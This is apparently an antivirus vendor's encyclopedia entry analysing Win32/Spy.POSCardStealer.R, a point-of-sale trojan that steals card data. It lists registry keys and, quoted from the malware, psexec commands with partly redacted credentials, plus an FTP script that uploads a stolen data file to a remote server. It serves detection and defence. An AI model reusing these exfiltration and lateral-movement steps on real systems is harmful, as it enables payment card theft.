Win32/Spy.POSCardStealer [Threat Name] go to Threat

Win32/Spy.POSCardStealer.R [Threat Variant Name]

Category trojan
Size 110592 B
Detection created Jan 17, 2014
Detection database version 9304
Aliases Trojan:Win32/Ploscato.A (Microsoft)
  BackDoor-FBPL.trojan (McAfee)
  TR/Ploscato.A (Avira)
Short description

Win32/Spy.POSCardStealer.R is a trojan that uploads files to a remote server.

Installation

The trojan does not create any copies of itself.


The trojan may set the following Registry entries:

  • [HKEY_LOCAL_MACHINE\­SYSTEM\­CurrentControlSet\­services\­BladeLogic]
    • "DisplayName" = "BladeLogic"
    • "ErrorControl" = 0
    • "FailureActions" = %data%
    • "ImagePath" = "%malwarefilepath%"
    • "ObjectName" = "LocalSystem"
    • "Start" = 2
    • "Type" = 272

The trojan may execute the following commands:

  • cmd /c net start BladeLogic
Information stealing

The trojan tries to move file (source, destination):

  • \­\­10.1%removed%1\­NT\­twain_32a.dll, %malwarefilefolder%\­data_%datetimestamp%.txt

The file is then sent to a remote computer.


The trojan creates the following file:

  • %malwarefilefolder%\­cmd.txt

The trojan writes the following entries to the file:

  • open 19%removed%.182
  • d%removed%w
  • C%removed%9
  • cd public_html
  • cd cgi-bin
  • bin
  • send %malwarefilefolder%\­data_%datetimestamp%.txt
  • quit

The trojan executes the following command:

  • ftp -s: %malwarefilefolder%\­cmd.txt
Other information

The trojan executes the following commands:

  • psexec /accepteula \­\­10.1%removed%1 -u tt%removed%ser -p Bac%removed% cmd /c "taskkill /IM bladelogic.exe /F"
  • psexec /accepteula \­\­10.1%removed%1 -u tt%removed%ser -p Bac%removed% -d bladelogic

The trojan may delete the following files:

  • %malwarefilefolder%\­cmd.txt
  • %malwarefilefolder%\­data_%datetimestamp%.txt

Please enable Javascript to ensure correct displaying of this content and refresh this page.